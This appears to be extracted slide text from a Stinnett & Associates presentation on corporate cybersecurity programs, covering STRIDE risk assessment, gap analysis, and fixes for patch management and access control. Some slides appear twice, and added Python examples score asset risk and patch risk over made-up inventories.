copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high-risk assets exist.
• Risk assessments should be performed annually or when significant changes to the environment occur.
• Stinnett uses Microsoft STRIDE Threat Modeling to semi-qualitatively measure cybersecurity risks, in order to identify, estimate, and prioritize information security risks.
Risk assessment flow: Identification of Assets → Asset Locations → Classification of Assets → Threat Modeling → Calculated Risk Results
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets:
• What value do the assets have?
  • Credit card data
  • Employee or customer records
  • Bank accounts
  • Intellectual property
  • Trade secrets
  • Insider knowledge
• Who would want the data?
• Data location
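The risk assessment flow described on the two slides above (identify assets and their locations, classify them by the value of the data they hold, model threats with STRIDE, calculate and rank the results), carried through as an added worked example; this is illustration code, not the presentation's or Stinnett's own method. The assets, locations, the 1..5 value scale, the likelihood estimates and the scoring rule (likelihood × impact, with an exposure bump for internet-facing assets) are all constructed assumptions.

```python
"""Semi-quantitative STRIDE risk assessment over a small asset inventory."""
from dataclasses import dataclass

# Microsoft STRIDE threat categories (letter -> name).
STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}

# Classification of assets: the value of the data an asset holds, on a
# constructed 1..5 scale mirroring the deck's "what value do the assets have".
DATA_VALUE = {
    "credit card data": 5,
    "bank accounts": 5,
    "trade secrets": 5,
    "employee records": 4,
    "customer records": 4,
    "intellectual property": 4,
    "insider knowledge": 3,
    "public marketing content": 1,
}


@dataclass
class Asset:
    name: str
    location: str          # asset location (cloud, on-premises LAN, laptop ...)
    data: list             # kinds of data the asset holds (keys of DATA_VALUE)
    internet_facing: bool
    likelihood: dict       # STRIDE letter -> estimated likelihood 1..5 (constructed)

    def value(self) -> int:
        """Classification step: an asset is worth its most valuable data."""
        return max(DATA_VALUE[kind] for kind in self.data)


def threat_model(asset: Asset) -> list:
    """Threat-modeling step: score each STRIDE category as likelihood x impact.
    Impact is the asset's value; internet exposure adds 1 to the likelihood of
    the network-reachable categories (S, T, D, E), capped at 5 (assumed rule)."""
    rows = []
    for letter, threat in STRIDE.items():
        likelihood = asset.likelihood.get(letter, 1)
        if asset.internet_facing and letter in "STDE":
            likelihood = min(5, likelihood + 1)
        impact = asset.value()
        rows.append({"asset": asset.name, "location": asset.location,
                     "threat": threat, "likelihood": likelihood,
                     "impact": impact, "risk": likelihood * impact})
    return rows


def calculated_risk(assets: list) -> list:
    """Final step: every (asset, threat) pair ranked highest risk first."""
    rows = [row for asset in assets for row in threat_model(asset)]
    return sorted(rows, key=lambda r: (-r["risk"], r["asset"], r["threat"]))


# Constructed inventory (identification of assets and their locations).
INVENTORY = [
    Asset("Payment web portal", "Cloud (DMZ)",
          ["credit card data", "customer records"], True,
          {"S": 3, "T": 2, "R": 2, "I": 3, "D": 3, "E": 2}),
    Asset("HR file server", "On-premises LAN", ["employee records"], False,
          {"S": 2, "T": 2, "R": 1, "I": 3, "D": 1, "E": 2}),
    Asset("Marketing website", "Cloud", ["public marketing content"], True,
          {"S": 2, "T": 3, "R": 1, "I": 1, "D": 3, "E": 1}),
]

if __name__ == "__main__":
    for row in calculated_risk(INVENTORY)[:6]:
        print(f'{row["risk"]:>3}  {row["asset"]:<20} {row["threat"]}')
```

The ranked output is what the deck calls the calculated risk results: the card-holding, internet-facing portal dominates the top of the list, while the low-value marketing site ranks last even though it is equally exposed.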
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand the cybersecurity controls in place.
• Evaluate control design as it relates to commonly accepted framework(s).
• Identify control gaps and create a baseline for cybersecurity maturity in the organization.
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy for ensuring that its IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures; the failures include:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published.
• Companies do not know all of the information devices in their network and are therefore unable to adequately assess their patch management process.
User and Administrator-Level Access – Companies fail to adequately assess user access levels to ensure that the principle of least privilege is applied as much as possible. Within the IT department, a failure of least privilege can result in multiple individuals and IDs with access to and/or knowledge of higher-level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end-user training around cybersecurity. Often, the uneducated or untrained end user is the cyber attacker's first entry point into the company.
CYBERSECURITY FAILURES AND FIXES
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored, and how they are protected.
• Perform an inventory of IT devices and assess each device's risk relating to patches.
• Focus on higher-risk areas such as internet-facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems).
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters, and change interval).
• Implement a continual end-user training program.
• Ensure backups and recovery plans work as intended and are properly segregated.
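The device, patch and ID fixes in the list above, worked through as an added example that is not from the presentation: it ranks each inventoried device by patch risk (weighting missing patches older than a year, the failure cited on the previous slide, and internet-facing devices), lists admin IDs with no documented reason for their access level, and compares password parameters with a baseline. The devices, products, patch dates, accounts, the baseline thresholds and the scoring weights are all constructed assumptions.

```python
"""Patch-risk ranking and access review over a constructed inventory."""
from datetime import date

# Assessment date (the presentation date) used for patch-age arithmetic.
ASSESSMENT_DATE = date(2017, 10, 27)

# Constructed vendor patch list: product -> (current fixed version, date published).
PATCHES = {
    "adobe-reader": ("2017.012", date(2017, 8, 8)),
    "java-jre":     ("8u144",    date(2017, 7, 18)),
    "web-browser":  ("62.0",     date(2017, 10, 17)),
    "server-os":    ("2016-10",  date(2016, 10, 11)),
}

# Constructed device inventory: installed version per product.
DEVICES = [
    {"host": "web01",  "internet_facing": True,
     "software": {"server-os": "2016-10", "java-jre": "8u121"}},
    {"host": "fs01",   "internet_facing": False,
     "software": {"server-os": "2015-06"}},
    {"host": "pc-042", "internet_facing": False,
     "software": {"adobe-reader": "2017.012", "web-browser": "61.0"}},
]

def missing_patches(device: dict, today: date) -> list:
    """(product, days since the fix was published) for every product that is
    not at the vendor's current fixed version."""
    out = []
    for product, installed in device["software"].items():
        fixed, published = PATCHES[product]
        if installed != fixed:
            out.append((product, (today - published).days))
    return out

def patch_risk(device: dict, today: date) -> dict:
    """Score a device: 1 per missing patch, 3 if the patch is more than a year
    old (the deck's finding), doubled for internet-facing devices (assumed weights)."""
    missing = missing_patches(device, today)
    score = sum(3 if age > 365 else 1 for _, age in missing)
    if device["internet_facing"]:
        score *= 2
    return {"host": device["host"], "missing": missing, "score": score}

def rank_devices(devices: list, today: date) -> list:
    """Highest patch risk first: where remediation effort should go."""
    return sorted((patch_risk(d, today) for d in devices), key=lambda r: -r["score"])

# Constructed inventory of user and admin IDs with the stated reason for access.
ACCOUNTS = [
    {"id": "jsmith",     "admin": False, "justification": "payroll clerk"},
    {"id": "svc_backup", "admin": True,  "justification": "nightly backup job"},
    {"id": "tmp_admin",  "admin": True,  "justification": ""},
]

def admin_ids_without_justification(accounts: list) -> list:
    """Admin IDs whose access level has no documented reason (review candidates)."""
    return [a["id"] for a in accounts if a["admin"] and not a["justification"].strip()]

# Constructed baseline for the deck's password parameters.
BASELINE = {"min_length": 12, "character_classes": 3, "max_age_days": 90}

def password_policy_gaps(policy: dict) -> list:
    """Parameters (length, characters, change interval) that fall short of the baseline."""
    gaps = []
    if policy["min_length"] < BASELINE["min_length"]:
        gaps.append("length")
    if policy["character_classes"] < BASELINE["character_classes"]:
        gaps.append("characters")
    if policy["max_age_days"] > BASELINE["max_age_days"]:
        gaps.append("change interval")
    return gaps

if __name__ == "__main__":
    for row in rank_devices(DEVICES, ASSESSMENT_DATE):
        print(row["score"], row["host"], row["missing"])
    print("admin IDs to review:", admin_ids_without_justification(ACCOUNTS))
```

Note that the internal file server outranks the internet-facing web server here because its operating-system patch is over a year old; the device inventory is what makes that visible at all.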